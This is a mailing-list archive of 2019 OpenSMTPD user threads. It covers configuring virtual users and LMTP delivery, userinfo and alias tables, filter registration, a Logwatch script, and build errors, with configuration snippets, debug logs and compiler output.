> smtp: 0x564267537b60: message fd 14
> smtp: 0x564267537b60: message begin
> debug: 0x564267537b60: end of message, error=0
> 21fcdb35fa8bc05b smtp message msgid=22c2f515 size=245 nrcpt=1 proto=ESMTP
> 21fcdb35fa8bc05b smtp envelope evpid=22c2f5151c4decec
> from= to=
> debug: scheduler: evp:22c2f5151c4decec scheduled (mda)
> mda: new user 21fcdb36b331cade for ":lmtpd" delivering as "lmtpd"
> debug: lka: userinfo :lmtpd
> lookup: lookup "lmtpd" as USERINFO in table getpwnam: ->
> "115:115:/opt/smptd/var/lmtpd"
> debug: mda: new session 21fcdb37f01f7374 for user ":lmtpd" evpid
> 22c2f5151c4decec
> debug: mda: no more envelope for ":lmtpd"
> debug: mda: got message fd 14 for session 21fcdb37f01f7374 evpid
> 22c2f5151c4decec
> debug: mda: querying mda fd for session 21fcdb37f01f7374 evpid
> 22c2f5151c4decec
> [{EPOLLIN, {u32=7, u64=7}}], 32, -1) = 1
> epoll_ctl(3, EPOLL_CTL_DEL, 7, 0x7ffeb16e607c) = 0
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 12
> socket(AF_INET, SOCK_DGRAM, IPPROTO_IP) = 

Re: Virtual User handling

2019-09-06 Thread Edgar Pettijohn

On Sep 6, 2019 12:40 PM, Ede Wolf  wrote:
>
> Am 06.09.19 um 18:59 schrieb Edgar Pettijohn:
> > Sounds like the mail.lmtp program is missing or not where it belongs. 
> > Should live somewhere in /usr/local/libexec. Find it and let us know where 
> > it is and somebody can probably tell you where it needs to be. Or it just 
> > didn't get built for some reason.
>
> So it is a binary, thats useful information. Having specified /opt/smtpd 
> as prefix during ./configure, it is located here:
>
> /opt/smptd/libexec/opensmtpd/mail.lmtp
>

Throw it in /usr/local/libexec/smtpd/ and see what happens. May be a build 
tools bug.

> Since libexec is usually not path aynway, I wonder, how to make smtpd 
> recognize it, if --prefix is not honored?
>
>
> > Your copy is apparently different from mine.
>
>
> Nope. I've cited smtpd.conf (from the opensmtpd homepage), you have 
> looked into tables. Since userbase is the only location I've come along 
> that uses the userinfo table, I've went with the attribute, not the 
> argument.
>

Agreed. Must be a bug in the documentation or the daemon. My bet is the manual 
is wrong.

Edgar
> Thanks again for helping out!
>
> Ede
>


Re: Virtual User handling

2019-09-06 Thread Edgar Pettijohn

On Sep 6, 2019 10:46 AM, Ede Wolf  wrote:
>
>
> > Maybe run 'smtpd -dv -T expand -T lookup -T rules' and see how OpenSMTPD 
> > is translating the aliases and which rules it's matching etc.
>
> This is a really helpful command. Maybe using that I can be a bit more 
> precise in defining my confusion.
>
> My simple setup, git pulled and build yesterday:
>
>
> action "deliver" lmtp "/run/cyrus/socket/lmtp" rcpt-to user lmtpd
> match from any for domain "example.com" rcpt-to  action deliver
>
>
> With "musers" only containing good ole b...@example.com and "lmtpd" being 
> a regular system user. Bob is not known to the system. And shall not.
>
> Now, the man page reads:
>
> user username
> Specify the username for performing the delivery, to be looked up with 
> getpwnam(3).
>
> and:
>
> userbase 
> Use the mapping table for user lookups instead of the getpwnam(3) function.
> ->The userbase does not apply for the user option.<-
>

Your copy is apparently different from mine.

Userinfo tables

User info tables are used in rule context to specify an alternate user base, 
mapping virtual users to local system users by UID, GID and home directory.

action name method userbase 

A userinfo table looks as follows:

joe 1000:100:/home/virtual/joe jack 1000:100:/home/virtual/jack 

In this example, both joe and jack are virtual users mapped to the local system 
user with UID 1000 and GID 100, but different home directories. These 
directories may contain a forward(5) file. This can be used in conjunction with 
an alias table that maps an email address or the domain part to the desired 
virtual username. For example:

j...@example.org joe j...@example.com jack 

It has to map to a system user.
If you want it to be lmtpd just replace the 1000:100 above with lmtpds uid:gid

> So my "user" attribute is lmtpd, a regular system user. But:
>
> af0267593be5b0a1 smtp connected address=
> expand: 0x5598b9f68328: expand_insert() called for 
> address:b...@example.com[parent=(nil), rule=(nil)]
> expand: 0x5598b9f68328: inserted node 0x5598b9f6a020
> expand: lka_expand: address: b...@example.com [depth=0]
> lookup: match "1.2.3.4" as NETADDR in table static: -> true
> lookup: match "example.com" as DOMAIN in table static: -> true
> lookup: match "b...@example.com" as MAILADDR in table static:musers -> true
> rule #1 matched: match from any for domain  rcpt-to musers 
> action deliver
> expand: 0x5598b9f68328: expand_insert() called for 
> username:bob[parent=0x5598b9f6a020, rule=0x5598b9f77e30, 
> dispatcher=0x5598b9f79750]
> expand: 0x5598b9f68328: inserted node 0x5598b9f6a580
>
> expand: lka_expand: username: bob [depth=1, sameuser=0]
> lookup: lookup "bob" as USERINFO in table getpwnam: -> none
> expand: lka_expand: user-part does not match system user
> expand: 0x5598b9f68328: clearing expand tree
> af0267593be5b0a1 smtp failed-command command="RCPT TO:" 
> result="550 Invalid recipient: "
>
> The problem is obviously: "lookup "bob" as USERINFO in table 
> getpwnam: -> none"
>
>
>
> Now the local delivery should be done with the user lmtpd, why is user 
> "bob" then looked up at all via USERINFO getpwman, instead of lmtpd, 
> when userinfo shall not be used with the "user" attribute.
>
> Wether "userbase" is invoked via getpwnam or a USERINFO table, should 
> make no difference? It should not be used, when the "user" attribute is 
> being used?
>
> Automagically I should add, I have not defined the userbase parameter 
> anywhere in my config.
>
> Hopefully I've been able to narrow down my lack of comprehention. There 
> is something in the manpage I get wrong.
>
> Thanks
>
> Ede
>


Re: OpenSMTPD-Logwatch script.

2019-09-05 Thread Edgar Pettijohn
Look for poolporg on GitHub. He has a filter-eventlog that you can look at for 
inspiration.

Edgar
On Sep 5, 2019 5:37 AM, Reio Remma  wrote:
>
> On 05/09/2019 13:32, Martijn van Duren wrote:
> > On 9/5/19 11:55 AM, Reio Remma wrote:
> >> On 05/09/2019 11:33, gil...@poolp.org wrote:
> >>> Yes, see the smtpd.conf(5) man page:
> >>>
> >>> filter myreporter proc-exec "/tmp/reporting.sh"
> >>>
> >>> listen on [...] filter myreporter
> >> mproc: pony -> lka : 291 IMSG_SMTP_EXPAND_RCPT
> >>
> >> SMTPD seems to get stuck here with no errors. This is with the simple:
> >>
> >> filter reporter proc-exec "/etc/opensmtpd/reporter.sh"
> >>
> >> #!/bin/sh
> >> while read line; do
> >>      echo $line >> /var/log/opensmtpd.log
> >> done
> >>
> >> Reio
> >>
> > You need to register what events you want to receive and finish up with
> > register
> >
> > $ cat test.sh
> > #!/bin/sh
> >
> > while read line; do
> >  echo $line >&2
> >  if [ "${line%%\
> >  if [ "${line#*\
> >  echo "register
> >  echo "register
> >  fi
> >  continue
> >  fi
> > done
> >
> > Possible values for report are (from lka_report.c):
> > static struct smtp_events {
> >  const char *event;
> > } smtp_events[] = {
> >  { "link-connect" },
> >  { "link-disconnect" },
> >  { "link-greeting" },
> >  { "link-identify" },
> >  { "link-tls" },
> >  { "link-auth" },
> >
> >  { "tx-reset" },
> >  { "tx-begin" },
> >  { "tx-mail" },
> >  { "tx-rcpt" },
> >  { "tx-envelope" },
> >  { "tx-data" },
> >  { "tx-commit" },
> >  { "tx-rollback" },
> >
> >  { "protocol-client" },
> >  { "protocol-server" },
> >
> >  { "filter-response" },
> >
> >  { "timeout" },
> > };
> >
> > Possible values for filter are:
> > static struct filter_exec {
> >  enum filter_phase   phase;
> >  const char *phase_name;
> >  int    (*func)(struct filter_session *, struct 
> >filter *, uint64_t, const char *);
> > } filter_execs[FILTER_PHASES_COUNT] = {
> >  { FILTER_CONNECT,   "connect",  filter_builtins_connect },
> >  { FILTER_HELO,  "helo", filter_builtins_helo },
> >  { FILTER_EHLO,  "ehlo", filter_builtins_helo },
> >  { FILTER_STARTTLS,  "starttls", filter_builtins_notimpl },
> >  { FILTER_AUTH,  "auth", filter_builtins_notimpl },
> >  { FILTER_MAIL_FROM, "mail-from",    filter_builtins_mail_from 
> >},
> >  { FILTER_RCPT_TO,   "rcpt-to",  filter_builtins_rcpt_to },
> >  { FILTER_DATA,  "data", filter_builtins_notimpl },
> >  { FILTER_DATA_LINE, "data-line",    filter_builtins_notimpl },
> >  { FILTER_RSET,  "rset", filter_builtins_notimpl },
> >  { FILTER_QUIT,  "quit", filter_builtins_notimpl },
> >  { FILTER_NOOP,  "noop", filter_builtins_notimpl },
> >  { FILTER_HELP,  "help", filter_builtins_notimpl },
> >  { FILTER_WIZ,   "wiz",  filter_builtins_notimpl },
> >  { FILTER_COMMIT,    "commit",   filter_builtins_notimpl },
> > };
> >
> > reports come in in the format:
> > report
> >
> > filters come in in the format:
> > filter
> >
> > Note that filters require a proceed, rewrite, reject, or disconnect
> > reply in the form:
> >
> > filter-result
> > filter-result
> > filter-result
> > filter-result
> >
> > Note that this is mostly stable, but some changes may occur, so
> > keep track of the version. Minor versions are backwards compatible,
> > major versions are not.
> >
>
> Thanks! I'll keep digging. :)
>
> Reio
>


Re: OpenSMTPD-Logwatch script.

2019-09-03 Thread Edgar Pettijohn
On Tue, Sep 03, 2019 at 09:29:14PM +0300, Reio Remma wrote:
> On 27.04.2018 12:26, Reio Remma wrote:
> > Hello all,
> > 
> > I've whipped together a Logwatch script for OpenSMTPD. I've anyone is
> > interested on giving it a try, it's now at:
> > 
> > https://github.com/whataboutpereira/OpenSMTPD-Logwatch
> 
> Hello! I've now updated the Logwatch script to work with OpenSMTPD 6.6.0
> (current portable).
> 
> Good luck,
> Reio
>

Lots of errors with newer perls. :(

deathstar$ perl -v

This is perl 5, version 28, subversion 2 (v5.28.2) built for amd64-openbsd

Copyright 1987-2019, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.

deathstar$ ./opensmtpd.pl   
 
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 523.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 523, near "} ) "
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 527.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 527, near "};"
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 541.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 541, near "} )"
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 553.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 553, near "} ) "
Experimental keys on scalar is now forbidden at ./opensmtpd.pl line 557.
Type of arg 1 to keys must be hash or array (not hash element) at 
./opensmtpd.pl line 557, near "};"
./opensmtpd.pl has too many errors 



Re: Virtual User handling

2019-09-02 Thread Edgar Pettijohn

On Sep 2, 2019 3:18 AM, Reio Remma  wrote:
>
> On 02/09/2019 10:35, Ede Wolf wrote:
> > Hello Edgar,
> >
> > thanks very much for your in depth reply and the effort you've put 
> > into it.
> >
> > As for the "user" keyword, the way I understand this, it that it 
> > equals the "as" statement in the old version.
> >
> > ... lmtp "/run/cyrus/lmtp" rcpt-to ->as nobody<-
>
> I'm using multiple virtual domains myself and delivering to Dovecot via 
> LMTP with no user parameter. I _suspect_ it's more useful when you let 
> OpenSMTPD to deliver straight to mailboxes.
>
> > Back to your reply: That catchall from your example in "@ catchall" is 
> > not a keyword, is it? But a local user accout?
>
> @example.com need to be aliased to a real mail account to receive all these.
>
> > > but some real user has to own the mailbox...
> >

When smtpd goes looking for a . forward file it gets mad if there isn't a 
mailbox to look in. :)

> > Care to explain, why is that? From my unknowledgable point of view, 
> > the mailbox handling should be done on the other side of the lmtpd 
> > socket. This misconception is at the very heart of my question.
>
> Maybe run 'smtpd -dv -T expand -T lookup -T rules' and see how OpenSMTPD 
> is translating the aliases and which rules it's matching etc.
>
> Good luck,
> Reio
>
>


Re: Building 6.4.2p1 without ssl?

2019-09-02 Thread Edgar Pettijohn
Look through the archives. There was someone recently building on Debian with a 
similar issue. 
On Sep 2, 2019 2:48 AM, Ede Wolf  wrote:
>
> Hello,
>
> trying to compile opensmtp it fails with openssl errors, so I've tried 
> to specify --without-libssl at configure time, as at least for testing 
> and learning the basics it is not really that important, but it does not 
> seem to get honored.
>
> Any idea, what I may have to change?
>
> Thanks
>
> Ede
>
>
>
> In case anybody has an idea for building with openssl, here are the 
> final words of the compiler:
>
>
> # gcc --version
> gcc (Gentoo 8.3.0-r1 p1.1) 8.3.0
>
> # openssl version
> OpenSSL 1.1.1c  28 May 2019
>
>
>
> ..
>
> gcc -DHAVE_CONFIG_H -I. -I..  -I../smtpd -I../openbsd-compat 
> -I../openbsd-compat/err_h -I/usr/include   -mtune=skylake -march=skylake 
> -fomit-frame-pointer -O2 -pipe  -fPIC -DPIC -Wall -Wpointer-arith 
> -Wuninitialized -Wsign-compare -Wformat-security 
> -Wsizeof-pointer-memaccess -Wno-pointer-sign -Wno-unused-result 
> -fno-strict-aliasing -fno-builtin-memset -fPIE -D_BSD_SOURCE 
> -D_DEFAULT_SOURCE  -c -o fmt_scaled.o fmt_scaled.c
> fmt_scaled.c: In function 'fmt_scaled':
> fmt_scaled.c:243:52: warning: '%1lld' directive output may be truncated 
> writing between 1 and 17 bytes into a region of size between 0 and 5 
> [-Wformat-truncation=]
>     (void)snprintf(result, FMT_SCALED_STRSIZE, "%lld.%1lld%c",
>  ^
> fmt_scaled.c:243:46: note: directive argument in the range 
> [-9007199254740991, 9007199254740991]
>     (void)snprintf(result, FMT_SCALED_STRSIZE, "%lld.%1lld%c",
>    ^~
> In file included from /usr/include/stdio.h:867,
>   from openbsd-compat.h:189,
>   from includes.h:67,
>   from fmt_scaled.c:41:
> /usr/include/bits/stdio2.h:67:10: note: '__builtin___snprintf_chk' 
> output between 5 and 40 bytes into a destination of size 7
>     return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1,
>    ^~~~
>  __bos (__s), __fmt, __va_arg_pack ());
>  ~
> gcc -DHAVE_CONFIG_H -I. -I..  -I../smtpd -I../openbsd-compat 
> -I../openbsd-compat/err_h -I/usr/include   -mtune=skylake -march=skylake 
> -fomit-frame-pointer -O2 -pipe  -fPIC -DPIC -Wall -Wpointer-arith 
> -Wuninitialized -Wsign-compare -Wformat-security 
> -Wsizeof-pointer-memaccess -Wno-pointer-sign -Wno-unused-result 
> -fno-strict-aliasing -fno-builtin-memset -fPIE -D_BSD_SOURCE 
> -D_DEFAULT_SOURCE  -c -o fparseln.o fparseln.c
> rm -f libopenbsd-compat.a
> /usr/bin/ar cru libopenbsd-compat.a base64.o bsd-getpeereid.o bsd-misc.o 
> bsd-waitpid.o entropy.o event_asr_run.o fgetln.o freezero.o getopt.o 
> imsg.o imsg-buffer.o pidfile.o pw_dup.o reallocarray.o recallocarray.o 
> setproctitle.o setresguid.o strlcat.o strlcpy.o strmode.o strtonum.o 
> strsep.o vis.o xmalloc.o  crypt_checkpass.o  bsd-closefrom.o   bsd-err.o 
> errc.o  fmt_scaled.o  fparseln.o
> ranlib libopenbsd-compat.a
> make[2]: Leaving directory '/root/build/opensmtpd-6.4.2p1/openbsd-compat'
> Making all in mk
> make[2]: Entering directory '/root/build/opensmtpd-6.4.2p1/mk'
> Making all in smtpd
> make[3]: Entering directory '/root/build/opensmtpd-6.4.2p1/mk/smtpd'
> gcc -DHAVE_CONFIG_H -I. -I../..  -I../../smtpd -I../../openbsd-compat 
> -I../../openbsd-compat/err_h -I../../openbsd-compat/paths_h -I. 
> -I/usr/include  -DSMTPD_CONFDIR=\"/opt/smptd/etc\" 
> -DPATH_CHROOT=\"/opt/smptd/var/empty\" 
> -DPATH_SMTPCTL=\"/opt/smptd/sbin/smtpctl\" 
> -DPATH_MAILLOCAL=\"/opt/smptd/libexec/opensmtpd/mail.local\" 
> -DPATH_LIBEXEC=\"/opt/smptd/libexec/opensmtpd\" -DHAVE_CONFIG_H -DIO_SSL 
> -DCA_FILE=\"/etc/ssl/cert.pem\" -mtune=skylake -march=skylake 
> -fomit-frame-pointer -O2 -pipe  -fPIC -DPIC -Wall -Wpointer-arith 
> -Wuninitialized -Wsign-compare -Wformat-security 
> -Wsizeof-pointer-memaccess -Wno-pointer-sign -Wno-unused-result 
> -fno-strict-aliasing -fno-builtin-memset -fPIE -D_BSD_SOURCE 
> -D_DEFAULT_SOURCE  -D_GNU_SOURCE -DNEED_EVENT_ASR_RUN -c -o 
> ./../smtpd/smtpd-aliases.o `test -f '../../smtpd/aliases.c' 
> './'`../../smtpd/aliases.c
> ./../smtpd/aliases.c: In function 'aliases_get':
> ./../smtpd/aliases.c:56:23: warning: variable 'userbase' set but not 
> used [-Wunused-but-set-variable]
>    struct table    *userbase = NULL;
>     ^~~~
> ./../smtpd/aliases.c: In function 'aliases_virtual_get':
> ./../smtpd/aliases.c:114:23: warning: variable 'userbase' set but not 
> used [-Wunused-but-set-variable]
>    struct table    *userbase = NULL;
>     ^~~~
> gcc -DHAVE_CONFIG_H -I. -I../..  -I../../smtpd -I../../openbsd-compat 
> -I../../openbsd-compat/err_h -I../../openbsd-compat/paths_h -I. 
> -I/usr/include  -DSMTPD_CONFDIR=\"/opt/smptd/etc\" 
> 

Re: Virtual User handling

2019-08-31 Thread Edgar Pettijohn
On Fri, Aug 30, 2019 at 11:14:37PM -0500, Edgar Pettijohn wrote:
> On Fri, Aug 30, 2019 at 05:00:24PM +0200, Ede Wolf wrote:
> > Hello,
> > 
> >
> 
> Semi complete example at the bottom. I'll leave it to you to reverse translate
> to the old syntax. I didn't notice till after I was done and am too lazy to 
> change it. :) Also noticed while re-reading smtpd.conf(5) there is a `user' 
> keyword that can be used in an action:
> 
>  user username
>  Specify the username for performing the delivery, to be
>  looked up with getpwnam(3).
> 
>  This is used for virtual hosting where a single username
>  is in charge of handling delivery for all virtual users.
> 
>  This option is not usable with the mbox delivery method.
> 
> Not sure if its available in whichever version you are using, but may make 
> things easier enough to warrant an upgrade.
>  
> > While trying to learn opensmtpd, amongst other things I am struggeling with
> > the virtual user handling - for a non virtual domain setup.
> > 
> > From what I have been able to understand so far it seems, as if there is no
> > way to deliver mails to a lmtp socket, if there is not at least some
> > reference/mapping to a system user?
> > 
> > accept from any for domain "example.com" recipient  alias 
> > deliver to lmtp "/run/cyrus/lmtp" rcpt-to as nobody
> > 
> > where vusers contains:
> 
> vusers would need to be `key => value' pairs
> 
> > b...@example.com
> 
> This is a list. More suitable for a vdomains table.
> 
> > 
> > However, despite being listed in vusers, when trying to send a mail to bob,
> > it gets rejected with "550 Invalid recipient". Creating a systemuser "bob"
> > makes it work. But then I do not need the vusers table, so I am wondering,
> > is it possible to get along without the need for a system user?
> > Now the man page mentions a userbase parameter, and I assume, the according
> > table has to be in the format of the userinfo table mentioned in tables(5)?
> > What then effectively again refers to a system user - just with a mapping in
> > between.
> > 
> > My attempts with a single userlist instead so far either resulted in a
> > 'invalid use of table "susers" as USERBASE parameter' or simply a syntax
> > error.
> > 
> > Is that assumption correct? Is there no way of keeping virtual users
> > completely off the system or did I get something terribly wrong? Even when
> > not using mbox/Maildir at all, where this requirement could make sense?
> >
> 
> They are off the system, but some real user has to own the mailbox, etc...
>  
> > And since user filtering will eventually be done at an earlier stage, I
> > would like smtpd to be able to unconditionally forward any mail unaltered
> > (except aliases) to the lmtp socket.
> > 
> > So, in addition to bob@example as for the tests com I would like to be able
> > to use *@example.com or just example.com to not do any user checking at all.
> > Depending on the syntax requirements.
> > 
> > Is it possible to deactivate the user checking one way or the other?
> 
> you could use a catchall
> 
> /etc/mail/vusers
> 
> @ catchall
> 
> > 
> > Thanks for any insight or heads up on what I may have missed or
> > misunderstood.
> > 
> > 
> > Ede
> >
> 
> groupadd -g 5000 vmail
> useradd -g vmail -u 5000 vmail -d /var/vmail -m
> chown -R vmail.vmail /var/vmail
> 
> /etc/mail/userinfo
> 
> bob   5000:5000:/var/vmail/bob
> 
> /etc/mail/vusers
> 
> b...@example.com  bob
> 
> /etc/mail/smtpd.conf snippet
> 
> action "a01" lmtp "/var/cyrus/lmtp" rcpt-to  userbase  virtual 
>  
> # may need to finesse the above. I'm not using cyrus or userbase table, so 
> not 100 percent
> # sure if it will work as is.
> 
> match from all for domain  action "a01"

Another option (that I use):

/etc/mail/vusers

b...@example.comvmail

action "a01" lmtp "/var/cyrus/lmtp" rcpt-to virtual 
match from all for domain  action "a01"

No need for the userbase. I'm not really sure where a userbase table comes into 
play. Maybe someone out there using it can provide an example use case.

> 
> it sorta works...
> deathstar$ telnet localhost 25 
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 220 deathstar.my.domain ESMTP OpenSMTPD
> ehlo p.com
> 250-deathstar.my.domain Hello p.com [127.0.0.1], pl

Re: Virtual User handling

2019-08-30 Thread Edgar Pettijohn
On Fri, Aug 30, 2019 at 05:00:24PM +0200, Ede Wolf wrote:
> Hello,
> 
>

Semi complete example at the bottom. I'll leave it to you to reverse translate
to the old syntax. I didn't notice till after I was done and am too lazy to 
change it. :) Also noticed while re-reading smtpd.conf(5) there is a `user' 
keyword that can be used in an action:

 user username
 Specify the username for performing the delivery, to be
 looked up with getpwnam(3).

 This is used for virtual hosting where a single username
 is in charge of handling delivery for all virtual users.

 This option is not usable with the mbox delivery method.

Not sure if its available in whichever version you are using, but may make 
things easier enough to warrant an upgrade.
 
> While trying to learn opensmtpd, amongst other things I am struggeling with
> the virtual user handling - for a non virtual domain setup.
> 
> From what I have been able to understand so far it seems, as if there is no
> way to deliver mails to a lmtp socket, if there is not at least some
> reference/mapping to a system user?
> 
> accept from any for domain "example.com" recipient  alias 
> deliver to lmtp "/run/cyrus/lmtp" rcpt-to as nobody
> 
> where vusers contains:

vusers would need to be `key => value' pairs

> b...@example.com

This is a list. More suitable for a vdomains table.

> 
> However, despite being listed in vusers, when trying to send a mail to bob,
> it gets rejected with "550 Invalid recipient". Creating a systemuser "bob"
> makes it work. But then I do not need the vusers table, so I am wondering,
> is it possible to get along without the need for a system user?
> Now the man page mentions a userbase parameter, and I assume, the according
> table has to be in the format of the userinfo table mentioned in tables(5)?
> What then effectively again refers to a system user - just with a mapping in
> between.
> 
> My attempts with a single userlist instead so far either resulted in a
> 'invalid use of table "susers" as USERBASE parameter' or simply a syntax
> error.
> 
> Is that assumption correct? Is there no way of keeping virtual users
> completely off the system or did I get something terribly wrong? Even when
> not using mbox/Maildir at all, where this requirement could make sense?
>

They are off the system, but some real user has to own the mailbox, etc...
 
> And since user filtering will eventually be done at an earlier stage, I
> would like smtpd to be able to unconditionally forward any mail unaltered
> (except aliases) to the lmtp socket.
> 
> So, in addition to bob@example as for the tests com I would like to be able
> to use *@example.com or just example.com to not do any user checking at all.
> Depending on the syntax requirements.
> 
> Is it possible to deactivate the user checking one way or the other?

you could use a catchall

/etc/mail/vusers

@   catchall

> 
> Thanks for any insight or heads up on what I may have missed or
> misunderstood.
> 
> 
> Ede
>

groupadd -g 5000 vmail
useradd -g vmail -u 5000 vmail -d /var/vmail -m
chown -R vmail.vmail /var/vmail

/etc/mail/userinfo

bob 5000:5000:/var/vmail/bob

/etc/mail/vusers

b...@example.combob

/etc/mail/smtpd.conf snippet

action "a01" lmtp "/var/cyrus/lmtp" rcpt-to  userbase  virtual 
 
# may need to finesse the above. I'm not using cyrus or userbase table, so not 
100 percent
# sure if it will work as is.

match from all for domain  action "a01"

it sorta works...
deathstar$ telnet localhost 25 
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 deathstar.my.domain ESMTP OpenSMTPD
ehlo p.com
250-deathstar.my.domain Hello p.com [127.0.0.1], pleased to meet you
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-SIZE 36700160
250-DSN
250 HELP
mail from:
250 2.0.0 Ok
rcpt to: 
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself
to: u
from: me

hi bob.

.
250 2.0.0 0a7d910f Message accepted for delivery

a19e5552f2afe6dc smtp connected address=127.0.0.1 host=localhost
debug: aliases_virtual_get: 'bob' resolved to 1 nodes
debug: aliases_virtual_get: 'bob' resolved to 1 nodes
warn: smtpd: parent_forward_open: /var/mail/bob: No such file or directory
smtp: 0x1903053fd000: fd 13 from queue
smtp: 0x1903053fd000: message fd 13
smtp: 0x1903053fd000: message begin
debug: 0x19034b71f000: adding Date
debug: 0x19034b71f000: adding Message-ID
debug: 0x1903053fd000: end of message, error=0
a19e5552f2afe6dc smtp message msgid=0a7d910f size=335 nrcpt=1 proto=ESMTP
a19e5552f2afe6dc smtp envelope evpid=0a7d910fa2469b23 
from= to=
debug: scheduler: evp:0a7d910fa2469b23 scheduled (mda)
mda: new user a19e5554bded3360 for "userinfo:bob" delivering as "root"
debug: lka: userinfo userinfo:bob
debug: mda: new session a19e20bf2fa5 for user "userinfo:bob" evpid 
0a7d910fa2469b23
debug: mda: no more envelope for "userinfo:bob"
debug: 

Re: Question about match auth with the new syntax.

2019-08-28 Thread Edgar Pettijohn

On Aug 28, 2019 1:52 PM, Reio Remma  wrote:
>
> Hello!
>
> I've pretty much converted my setup to the new syntax now and I'm 
> wondering if I get this right.
>
> I understand that from local was changed to not include authenticated 
> users, but my question is does "match auth" match both authenticated and 
> local users?
>
> I currently have - "match auth from any for any action dkim" - and I see 
> that I can send mail from command line using that rule, so I'm guessing 
> yes. :)
>
> Maybe the man page could reflect these bits for match auth and match 
> from local.
>

Match from local for local is a default rule. You have to specifically negate 
it if you don't want it. 

Edgar

> Thanks!
> Reio
>


Re: stumped on virtual aliases

2019-08-24 Thread Edgar Pettijohn
On Sat, Aug 24, 2019 at 06:02:55PM +0200, Joseph A Borg wrote:
> AFAIK I can do that Edgar, I???m already filtering on domain, so the domain 
> stump is not really necessary. 
> 
> this is not an urgent work situation, I???m just trying things out and spent 
> way too much time understanding this not to bother the list. If there is a 
> workaround or it???s a known issue it???s fine. Most probably I???m 
> misunderstanding things.
> 
> Correct me if I???m wrong: I???m assuming, conceptually, that once the 
> aliases in a message's [RCPT TO list] are expanded, the new addresses go 
> through the rule set again and enqueued if they match something that ends up 
> in a mailbox, forwarded. At least that???s what I remember from on elf Gilles 
> articles. If I???m imagining too much then I???ll try something else. :)
> 
> I???m trying to run smtpd -F -v -T all and not getting anything on the 
> command line.

-F logs to syslogd. If you want to see it try `smtpd -dv -T all'

Not entirely helpful, but I switched to sql tables because I couldn't figure 
out a similar situation.

Edgar

> 
> 
> regards to all on a sultry Saturday evening
> 
> 
> > On 24 Aug 2019, at 17:43, Edgar Pettijohn  wrote:
> > 
> > On Sat, Aug 24, 2019 at 04:14:21PM +0200, Joseph A Borg wrote:
> >> I???m trying to match an email: nos...@domain.tld to expand to 
> >> webmas...@domain.tld and deliver to local mailbox.
> >> 
> >> My setup is pretty simple and works well for virtual mailboxes linked to a 
> >> couple of virtual domains. now I???m trying t add aliases to some accounts.
> >> 
> >> From the error, it seems like smtpd is not transforming the alias address 
> >> into the final address for delivery.
> >> Seems like I???m not understanding how smtpd transforms an recipient 
> >> address in an  into the actual recipient for delivery.
> >> 
> >> I must be conceptually stumped on this one.
> >> 
> >> I get the following error in logs and a return mail from smtpd to sender:
> >> 
> >>> 
> >>> I'm sorry to have to inform you that your message could not
> >>> be delivered to one or more recipients.
> >>> 
> >>> 
> >>> : host mx.domain.tld[xxx.xxx.xxx.xxx] said: 550 Invalid
> >>>   recipient:  (in reply to RCPT TO command)
> >>> Reporting-MTA: dns; st43p00im-zteg10071901.me.com
> >>> X-Postfix-Queue-ID: 4E253D8138E
> >>> X-Postfix-Sender: rfc822; sen...@domain2.tld
> >>> Arrival-Date: Sat, 24 Aug 2019 10:24:30 + (UTC)
> >>> 
> >>> Final-Recipient: rfc822;nos...@domain.tld
> >>> Original-Recipient: rfc822;nos...@domain.tld
> >>> Action: failed
> >>> Status: 5.0.0
> >>> Remote-MTA: dns; mx.domain.tld
> >>> Diagnostic-Code: smtp; 550 Invalid recipient: 
> >>> 
> >>> From: 
> >>> Subject: Fwd: Undelivered Mail Returned to Sender
> >>> Date: 24 August 2019 at 12:24:27 GMT+2
> >>> To: nos...@domain.tld
> >>> 
> >> 
> >> 
> >> 
> >> the configuration files for the domain and tables follows.
> >> 
> >> 
> >> 
> >> 
> >> # file:/etc/mail/domain.tld/accounts/valiases:
> >> =
> >>> nospam webmas...@domain.tld
> >> ## EOF
> >> 
> >> # file:/etc/mail/domain.tld/accounts/emails
> >> 
> >>> webmas...@domain.tld::/home/domain/mail/master
> >>> webdus...@domain.tld::/home/domain/mail/duster
> >>> webbus...@domain.tld::/home/domain/mail/buster
> > 
> > I'm not sure this will work. I'm not sure you can map a virtual user to 
> > a single system user with multiple `homes'.
> > 
> > maybe try:
> > 
> > webmaster   ::/home/domain/mail/master
> > 
> > and see if that gets you further.
> > 
> >> ## EOF
> >> 
> >> # file:/etc/mail/domain.sub.smtpd.conf
> >> =
> >> 
> >>> ## =
> >>> ## DOMAIN CONFIGURATION:
> >>> ## =
> >>> # TABLE DECLARATIONS:
> >>> # ---
> >>> table domains   \
> >>>file:/etc/mail/domain.tld/domains
> >>> table valiases  \
> >>>file:/etc/mail/domain.tld/accounts/valiases
> >>> table e-boxes   \
> >>>file:/etc/mail/domain.tld/accounts/emails
> >>> 
> >>> # ACTIONS
> >>> # ---
> >>> action valiases_set \
> >>>expand-only \ 
> > 
> > Seems like expand-only should work with `virtual' aliases, but I'm not sure.
> > Maybe remove it and see what happens.
> > 
> >>>virtual 
> >>> action deliver_virtual_set  \
> >>>maildir \
> >>>userbase 
> >>> 
> >>> # MATCHES
> >>> # ---
> >>> match from any  \
> >>>  for domain   \
> >>>  action valiases_set
> >>> match from any  \
> >>>  for domain   \
> >>>  action deliver_virtual_set
> >>> 
> >>> 
> >> 
> > 
> > Hope this helps.
> > 
> > Edgar
> 



Re: stumped on virtual aliases

2019-08-24 Thread Edgar Pettijohn
On Sat, Aug 24, 2019 at 04:14:21PM +0200, Joseph A Borg wrote:
